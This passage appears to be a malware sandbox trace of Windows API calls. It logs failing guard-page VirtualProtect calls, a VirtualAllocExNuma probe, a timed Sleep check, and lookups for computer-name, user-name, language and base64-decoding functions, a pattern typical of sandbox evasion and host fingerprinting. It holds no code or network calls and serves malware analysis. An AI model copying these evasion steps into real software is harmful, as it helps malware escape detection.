flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.857] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x4c29b8 [0147.857] VirtualProtect (in: lpAddress=0x4c29b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.858] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c2910 [0147.858] VirtualProtect (in: lpAddress=0x4c2910, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.859] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c2930 [0147.859] VirtualProtect (in: lpAddress=0x4c2930, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.859] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c3be0 [0147.860] VirtualProtect (in: lpAddress=0x4c3be0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.860] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c3bf8 [0147.860] VirtualProtect (in: lpAddress=0x4c3bf8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.861] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c3c10 [0147.861] VirtualProtect (in: lpAddress=0x4c3c10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.862] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c3c28 [0147.862] VirtualProtect (in: lpAddress=0x4c3c28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.862] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c3c48 [0147.862] VirtualProtect (in: lpAddress=0x4c3c48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.863] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x4c3c60 [0147.863] VirtualProtect (in: lpAddress=0x4c3c60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.864] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c3c80 [0147.864] VirtualProtect (in: lpAddress=0x4c3c80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.864] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c3ca0 [0147.864] VirtualProtect (in: lpAddress=0x4c3ca0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.865] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c3cb8 [0147.865] VirtualProtect (in: lpAddress=0x4c3cb8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.865] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c2948 [0147.866] VirtualProtect (in: lpAddress=0x4c2948, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.866] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c29e0 [0147.866] VirtualProtect (in: lpAddress=0x4c29e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0147.997] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount") returned 0x76745eb0 [0147.997] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0147.997] GetProcAddress (hModule=0x76720000, lpProcName="GetUserDefaultLangID") returned 0x7673ff30 [0147.997] GetProcAddress (hModule=0x76720000, lpProcName="CreateMutexA") returned 0x767466c0 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="HeapAlloc") returned 0x77202bd0 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="GetProcessHeap") returned 0x76737710 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="GetComputerNameA") returned 0x7673fbf0 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcess") returned 0x767338c0 [0147.998] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocExNuma") returned 0x76762710 [0147.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76600000 [0148.013] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x73f90000 [0148.791] GetProcAddress (hModule=0x76600000, lpProcName="GetUserNameA") returned 0x76622910 [0148.791] GetProcAddress (hModule=0x73f90000, lpProcName="CryptStringToBinaryA") returned 0x73fad6d0 [0148.792] GetCurrentProcess () returned 0xffffffff [0148.792] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x1388, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x30000 [0148.792] GetTickCount () returned 0x15061a5 [0148.792] Sleep (dwMilliseconds=0x3e80) [0158.814] GetTickCount () returned 0x150a035 [0158.819] GetProcessHeap () returned 0x4c0000 [0158.819] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x4c8268 [0158.819] GetComputerNameA (in: lpBuffer=0x4c8268, nSize=0x19ff64 | out: lpBuffer="XC64ZB", nSize=0x19ff64) returned 1 [0158.820] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x84 [0158.820] GetLastError () returned 0x0 [0158.820] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x4c7a78 [0158.820] VirtualProtect (in: lpAddress=0x4c7a78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.822] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c7e70 [0158.822] VirtualProtect (in: lpAddress=0x4c7e70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.826] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c7c78 [0158.826] VirtualProtect (in: lpAddress=0x4c7c78, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.827] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4c71e0 [0158.827] VirtualProtect (in: lpAddress=0x4c71e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.828] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c7c88 [0158.828] VirtualProtect (in: lpAddress=0x4c7c88, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.828] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c7390 [0158.828] VirtualProtect (in: lpAddress=0x4c7390, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.830] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x4c7c08 [0158.830] VirtualProtect (in: lpAddress=0x4c7c08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.831] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c7360 [0158.831] VirtualProtect (in: lpAddress=0x4c7360, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.832] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x4c7fc0 [0158.832] VirtualProtect (in: lpAddress=0x4c7fc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.833] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c72d0 [0158.833] VirtualProtect (in: lpAddress=0x4c72d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.834] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x4c7808 [0158.834] VirtualProtect (in: lpAddress=0x4c7808, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.835] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c7258 [0158.835] VirtualProtect (in: lpAddress=0x4c7258, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.835] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4c7830 [0158.835] VirtualProtect (in: lpAddress=0x4c7830, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.836] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c7348 [0158.836] VirtualProtect (in: lpAddress=0x4c7348, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.837] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4c7858 [0158.837] VirtualProtect (in: lpAddress=0x4c7858, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.837] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c7228 [0158.837] VirtualProtect (in: lpAddress=0x4c7228, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.838] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4c0528 [0158.838] VirtualProtect (in: lpAddress=0x4c0528, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.839] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c0550 [0158.839] VirtualProtect (in: lpAddress=0x4c0550, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.844] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4c0570 [0158.844] VirtualProtect (in: lpAddress=0x4c0570, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.845] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c0598 [0158.845] VirtualProtect (in: lpAddress=0x4c0598, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.845] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x4c7fe8 [0158.845] VirtualProtect (in: lpAddress=0x4c7fe8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.846] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c6fd0 [0158.846] VirtualProtect (in: lpAddress=0x4c6fd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.847] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x4c6fe0 [0158.847] VirtualProtect (in: lpAddress=0x4c6fe0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.847] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c73d8 [0158.847] VirtualProtect (in: lpAddress=0x4c73d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.848] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c7270 [0158.848] VirtualProtect (in: lpAddress=0x4c7270, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.849] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c72a0 [0158.849] VirtualProtect (in: lpAddress=0x4c72a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.849] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c7000 [0158.849] VirtualProtect (in: lpAddress=0x4c7000, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.850] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c7020 [0158.850] VirtualProtect (in: lpAddress=0x4c7020, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.851] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c72b8 [0158.851] VirtualProtect (in: lpAddress=0x4c72b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.851] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c7330 [0158.851] VirtualProtect (in: lpAddress=0x4c7330, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.852] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c72e8 [0158.852] VirtualProtect (in: lpAddress=0x4c72e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.853] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c7040 [0158.853] VirtualProtect (in: lpAddress=0x4c7040, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.853] LocalAlloc (uFlags=0x40, uBytes=0x3) returned 0x4c7050 [0158.853] VirtualProtect (in: lpAddress=0x4c7050, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.853] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x4c7060 [0158.853] VirtualProtect (in: lpAddress=0x4c7060, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.874] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c73a8 [0158.874] VirtualProtect (in: lpAddress=0x4c73a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.875] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8378 [0158.875] VirtualProtect (in: lpAddress=0x4c8378, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.875] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c7300 [0158.875] VirtualProtect (in: lpAddress=0x4c7300, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.876] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c7318 [0158.876] VirtualProtect (in: lpAddress=0x4c7318, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.876] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c83c8 [0158.876] VirtualProtect (in: lpAddress=0x4c83c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.877] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8620 [0158.877] VirtualProtect (in: lpAddress=0x4c8620, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.878] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c87a0 [0158.878] VirtualProtect (in: lpAddress=0x4c87a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.878] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c87b0 [0158.878] VirtualProtect (in: lpAddress=0x4c87b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.879] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8410 [0158.879] VirtualProtect (in: lpAddress=0x4c8410, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.879] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c85f0 [0158.880] VirtualProtect (in: lpAddress=0x4c85f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.881] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c85a8 [0158.881] VirtualProtect (in: lpAddress=0x4c85a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.882] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c8638 [0158.882] VirtualProtect (in: lpAddress=0x4c8638, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.883] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x4c8428 [0158.883] VirtualProtect (in: lpAddress=0x4c8428, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.884] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8608 [0158.884] VirtualProtect (in: lpAddress=0x4c8608, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.886] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c85c0 [0158.886] VirtualProtect (in: lpAddress=0x4c85c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.887] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8500 [0158.887] VirtualProtect (in: lpAddress=0x4c8500, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.891] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c8488 [0158.891] VirtualProtect (in: lpAddress=0x4c8488, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.892] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8440 [0158.892] VirtualProtect (in: lpAddress=0x4c8440, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.892] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c84a0 [0158.892] VirtualProtect (in: lpAddress=0x4c84a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.893] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x4c87d0 [0158.893] VirtualProtect (in: lpAddress=0x4c87d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.893] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4c87f0 [0158.893] VirtualProtect (in: lpAddress=0x4c87f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.894] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c84e8 [0158.894] VirtualProtect (in: lpAddress=0x4c84e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.895] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4c8928 [0158.895] VirtualProtect (in: lpAddress=0x4c8928, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.895] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8c08 [0158.895] VirtualProtect (in: lpAddress=0x4c8c08, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.896] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4c8518 [0158.896] VirtualProtect (in: lpAddress=0x4c8518, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.896] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8968 [0158.896] VirtualProtect (in: lpAddress=0x4c8968, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.897] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x4c8948 [0158.897] VirtualProtect (in: lpAddress=0x4c8948, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.898] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4c88c8 [0158.898] VirtualProtect (in: lpAddress=0x4c88c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.898] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c85d8 [0158.898] VirtualProtect (in: lpAddress=0x4c85d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.911] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8650 [0158.911] VirtualProtect (in: lpAddress=0x4c8650, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.912] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8698 [0158.912] VirtualProtect (in: lpAddress=0x4c8698, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.913] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x4c8458 [0158.913] VirtualProtect (in: lpAddress=0x4c8458, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.914] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x4c89e8 [0158.914] VirtualProtect (in: lpAddress=0x4c89e8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.915] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c8668 [0158.915] VirtualProtect (in: lpAddress=0x4c8668, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.915] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c8680 [0158.915] VirtualProtect (in: lpAddress=0x4c8680, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.916] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x4c8470 [0158.916] VirtualProtect (in: lpAddress=0x4c8470, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.968] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4c8888 [0158.968] VirtualProtect (in: lpAddress=0x4c8888, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.969] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c8d00 [0158.969] VirtualProtect (in: lpAddress=0x4c8d00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.969] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8868 [0158.969] VirtualProtect (in: lpAddress=0x4c8868, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.970] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x4c8988 [0158.970] VirtualProtect (in: lpAddress=0x4c8988, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.971] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4c8db0 [0158.971] VirtualProtect (in: lpAddress=0x4c8db0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.971] LocalAlloc (uFlags=0x40, uBytes=0x1f) returned 0x4c8e20 [0158.971] VirtualProtect (in: lpAddress=0x4c8e20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.972] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4c84b8 [0158.972] VirtualProtect (in: lpAddress=0x4c84b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.972] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c8c50 [0158.973] VirtualProtect (in: lpAddress=0x4c8c50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.973] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x4c8c60 [0158.973] VirtualProtect (in: lpAddress=0x4c8c60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.974] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4c8dc0 [0158.974] VirtualProtect (in: lpAddress=0x4c8dc0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.974] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4c8530 [0158.974] VirtualProtect (in: lpAddress=0x4c8530, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.975] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x4c8cb0 [0158.975] VirtualProtect (in: lpAddress=0x4c8cb0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.976] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c8d10 [0158.976] VirtualProtect (in: lpAddress=0x4c8d10, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.976] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4c86b0 [0158.976] VirtualProtect (in: lpAddress=0x4c86b0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.977] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x4c84d0 [0158.977] VirtualProtect (in: lpAddress=0x4c84d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.977] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x4c8d90 [0158.977] VirtualProtect (in: lpAddress=0x4c8d90, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x0) returned 0 [0158.978] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4c8e48 [0158.978] VirtualProtect (in: lpAddress=0x4c8e48, 